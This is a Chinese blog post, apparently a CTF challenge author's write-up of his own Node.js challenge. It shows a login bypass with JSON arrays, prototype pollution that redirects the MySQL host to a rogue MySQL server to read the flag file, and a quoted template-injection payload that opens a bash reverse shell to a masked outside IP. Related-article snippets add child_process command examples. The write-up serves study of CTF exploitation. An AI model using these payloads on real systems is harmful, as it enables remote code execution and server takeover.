一道有趣的关于nodejs的ctf题

最新推荐文章于 2024-04-27 17:12:18 发布
最新推荐文章于 2024-04-27 17:12:18 发布
阅读量3.5w 收藏 13
点赞数 6
分类专栏: ctf的wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/103675719
版权

首先,出题背景是公司要求我出一道简单的ctf题目,正好我最近在学习nodejs相关的东西,于是我就出了这道题目,题目源码,我已经打包上传到了GitHub上,地址是: https://github.com/niexinming/prototype_pullotion/
如果有兴趣,可以下载下来,研究一下

这个题目开局是一个登陆页面
在这里插入图片描述

在这里你会想到什么呢?爆破?nononono~
你要想到的是这是一道nodejs的题目啊,js本身就是一种弱类型语言,所以,你可以改变数据类型,来看看它会不会产生非预期的效果,你可以参考我以前翻译的过的文章
https://blog.csdn.net/niexinming/article/details/84889275

这篇文章中就介绍如何通过改变数据类型来绕过登录,所以,这个题目通过如下的方式就可以绕过登录:
首先抓包:
在这里插入图片描述

然后,修改用户名密码为数组,因为用户名和密码都是数组的第一个,所以只要把用户名和密码改成
{“user”:[0],“passwd”:[0]},就可以绕过登录

在这里插入图片描述
绕过登录之后,发现有一个地址,打开这个地址:http://106.75.10.182:3000/kfhkhkdsdshalkhkhaklhlahlkkhdfklhhjkhgdajgfhjaghghjasgfjh//jflkdsajklfjsakljfjkhkjhdsfgasdyuuyueuwguguiuidgffddjfj.js
发现是nodejs后端的源码:
在这里插入图片描述
可以看到这个题目可以通过控制host参数去改变mysql的连接地址,这里有个mysql客户端任意文件读取的问题,可以参考这个文章:https://blog.csdn.net/ls1120704214/article/details/88174003

但是如果直接在json中传递{“host”:””},根本不会有任何效果,因为我在57行写了过滤

if (body.host != undefined) {

如果发现有直接传递进来的host参数,nodejs就报错退出,所以,通过仔细观察源代码,发现这个代码有参数污染问题,关于参数污染,可以参考这篇文章:
https://www.4hou.com/technology/16328.html
所以就可以通过构造如下参数去改变host参数,把host参数变成我们自己mysql服务器的地址
首先,我要先把我服务器中的Rogue-mysql-Server 的rogue_mysql_server.py 中的filelist改成flag的地址
在这里插入图片描述
然后启动我的这个恶意的mysql服务器:
在这里插入图片描述
之后,我把host地址通过参数污染的方式改到我的这台服务器:
在这里插入图片描述
发送数据包后,我的服务器中收到了一个请求:
在这里插入图片描述
然后,去查看日志,就会看到flag

在这里插入图片描述
一个小插曲,因为我刚刚接触nodejs,所以,没有意识到里面其实有很多安全问题,我在出题的过程中错误的使用了nodejs的模板,导致Virink师傅用一个payload就把我的服务器给打下来了(拿下了服务器的控制权),通过跟virink 的交流我也学到了很多东西,最后我兑现了我的承诺,给师傅发了一个大红包
在这里插入图片描述

下面是virink的payload,发出来给大家学习

{"user":"test","passwd":"test","__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/xxx.xxx.xxx.xx/6666 0>&1\"');var __tmp2"}}

后来我把这个漏洞修复了,等了两周,再也没有人做出来

niexinming
关注
  • 6
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
AST-injection-ctf:在Nodejs应用中演示AST注入
04-23
AST注射CTFNodejs应用中演示AST注入。 需要Docker和docker-compose! 生成Node.js应用程序映像 docker build -t demo-ctf . 构建映像时忽略所有红线:))) 泊坞窗组成 docker-compose up -d 运行应用 转到本地主机:3000 重新加载,直到一切正常 尝试RCE ^^ 主意 浏览网站的功能,我们可以得出以下结果: 该站点用于统计功能,图形功能 勒索,勒索软件和受害者有3种主要模型 访问每个模型的路径以检查功能,请参阅两个模型勒索软件和受害者都有查看详细信息的功能。 检查两个模型的详细信息,查看受害者只能下载信息,勒索软件可以上传新配置以执行更新,可以上传文件以利用安全漏洞 在正确的功能中观察网站的源代码,以上传勒索软件配置文件: 使用模板引擎的网页是刀片 更新功能已重新注释以进行维护 var c
关于NodeJS中的循环引用详解
10-16
主要给大家介绍了关于NodeJS中的循环引用的相关资料,文中通过示例代码介绍的非常详细,对大家学习或者使用NodeJS具有一定的参考学习价值,需要的朋友们下面来一起学习学习吧
node.js 入门 ctf向 简单了解
qq_66748496的博客
01-11 707
阻塞调用是指调用结果返回之前,当前线程会被挂起,一直处于等待消息通知,不能够执行其他业务,函数只有在得到结果之后才会返回。两个中间件,express.json用于解析json请求,express用于解析url编码的内容,这两者在。非阻塞和阻塞的概念相对应,指在不能立刻得到结果之前,该函数不会阻塞当前线程,而会立刻返回。当一个同步调用发出后,调用者要一直等待返回消息(或者调用结果)通知后,才能进行后续的执行。URL到函数的映射。同步和异步指的是线程之间的关系,阻塞和非阻塞指的是同一线程的状态。
CTF-Show nodejs
最新发布
2301_80125214的博客
04-27 636
下载附件,有两个文件在Character.toUpperCase()函数中,字符ı会转变为I,字符ſ会变为S。在Character.toLowerCase()函数中,字符İ会转变为i,字符K会转变为k。所以用ctfſhow 123456登录就可以出flag了。
Nodejs ctf 基础
qq_61768489的博客
07-23 1361
总结数字与字符串比较时,会优先将纯数字型字符串转为数字之后再进行比较;而字符串与字符串比较时,会将字符串的第一个字符转为ASCII码之后再进行比较,因此就会出现第五行代码的这种情况;总结空数组之间比较永远为false,数组之间比较只比较数组间的第一个值,对第一个值采用前面总结的比较方法,数组与非数值型字符串比较,数组永远小于非数值型字符串;数组与数值型字符串比较,取第一个之后按前面总结的方法进行比较。应该执行eval()函数,可以执行js代码,那么就可以执行系统命令了。依旧是get传eval。...
CTFnodejs入门【持续更新】
weixin_51458899的博客
02-23 2781
ctfnodejs入门
记ByteCTF中的Node
WindrunnerMax
12-14 3184
记ByteCTF中的Node 我总觉得字节是跟Node过不去了,初赛和决赛都整了个Node目,当然PHP、Java都是必不可少的,只是我觉得Node类型的比较少见,所以感觉挺新鲜的。 Nothing 决赛的Node型,目如下: Can you get flag in a fully enclosed nodejs environment? http://39.106.69.116:30001 http://39.106.34.228:30001 直接访问http://39.106.34.228:
nodejs-security-must-know:这是关于nodejs安全性的说明
05-01
Nodejs安全性必须知道通过阅读@ChetanKarade撰写的令人赞叹的《保护节点应用程序安全》一书,这是有关Node.js安全的说明,该书以非常简单的方式介绍了几个常见漏洞,并提供了相关的npm模块作为保护Node.js Web Apps...
面试精选 第五篇 MVC框架和NodeJS 答案
07-11
面试精选 第五篇 MVC框架和NodeJS 答案 二十八道精选面试以及答案
NodeJs技术经典文档
07-22
资源名称:NodeJs技术经典文档资源目录:【】Node.js开发指南_中文正版【】nodejs开发指南pdf及源码及win安装程序【】nodejs手册中文【】NodeJs教程【】umav4simple【】七天学会NodeJS【】七天学会NodeJS【】深入浅...
ctf.show的 node.js(web334-web342)
wanan的博客
09-30 533
ctf.show的 node.js(web334-web342)
CTF实验室-超简单的js
chiou9207的博客
04-28 1154
超简单的js 源代码: <html><head><title>超简单的js</title></head><body><p>这是从一个老外那里抄来的,应该很简单的。。吧?</p><fo...
CTF比赛的一道javascript
qq_32445689的博客
03-14 3327
CTF比赛中的一道javascript,考察了很多知识。在做的过程也很有趣,在此发表给大家
ctfshow-web入门 nodejs篇部分
volcano的博客
05-16 2302
ctfshownodejsweb334web335web336web337web338参考博客 nodejs web334 先下载附件,在user.js中发现了账号密码 module.exports = { items: [ {username: 'CTFSHOW', password: '123456'} ] }; 开环境,直接输入账号密码是错的,具体原因在login.js中 var findUser = function(name, password){ return users.
js
weixin_39147099的博客
08-15 467
记录一下自己遇到的一些js目 &amp;lt;!DOCTYPE html&amp;gt; &amp;lt;html lang=&quot;en&quot;&amp;gt; &amp;lt;head&amp;gt; &amp;lt;meta charset=&quot;UTF-8&quot;&amp;gt; &amp;lt;title&amp;gt;javascrip
[VNCTF 2021]Ez_game-JS类目学习记录
cjdgg的博客
03-15 2072
[VNCTF 2021]Ez_game-JS类目学习记录 之前没咋做过js的,也没写过js项目,但还是能简单看懂一些js代码,基础有点薄弱,所以记录下这次的做。 这就是游戏的开始叭,你有一个回旋镖作为武器,然后金币是0,生命值是3,这个游戏就是需要你打怪过关,应该是让你通关才会给你flag,那就先玩一局看看叭 手残党第二关就没了,玩了一局唯一的感受就是好难玩,不过死后它提示可以按ESC,按了下应该是重生,不过属性保留 emem啥也不说既然这个游戏要通关才给flag,那我就找找过关函数 还真有,
ctfshow nodejs
fmyyy1的博客
07-16 1024
334 源码给了 登录成功就能拿到flag var express = require('express'); var router = express.Router(); var users = require('../modules/user').items; var findUser = function(name, password){ return users.find(function(item){ return name!=='CTFSHOW' && item
CTFSHOW nodejs
羽的博客
02-18 6789
web334 在Character.toUpperCase()函数中,字符ı会转变为I,字符ſ会变为S。 在Character.toLowerCase()函数中,字符İ会转变为i,字符K会转变为k。 所以用ctfſhow 123456登录就可以出flag了 web335 require( 'child_process' ).spawnSync( 'ls', [ '/' ] ).stdout.toString() web336 require( 'child_process' ).spawnSync( 'ls
ctfshow nodejs wp
yink12138的博客
01-12 379
ctfshow nodejs部分的wp
nodejs 面试
09-23
Node.js是一种服务器端脚本工具,它可以用于构建各种类型的应用程序,包括命令行程序和企业级Web应用程序。下面是一些与Node.js相关的面试,根据难度分为初级、中级和高级三个部分: 初级Node.js面试: 1. 什么是Node.js? 2. Node.js的特点是什么? 3. Node.js的应用场景有哪些? 4. 如何在Node.js中处理异步操作? 5. 什么是回调函数?如何在Node.js中使用回调函数? 中级Node.js面试: 1. Node.js中的事件驱动是什么意思? 2. 如何使用Node.js创建一个简单的HTTP服务器? 3. Node.js中的模块化是如何实现的? 4. 什么是中间件?如何在Node.js中使用中间件? 5. 如何使用Node.js连接和操作数据库? 高级Node.js面试: 1. 什么是流式传输?如何在Node.js中使用流? 2. 如何实现文件上传和下载功能? 3. 如何使用Node.js实现多进程和负载均衡? 4. 什么是WebSocket?如何在Node.js中实现WebSocket通信? 5. 如何处理Node.js中的错误和异常?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值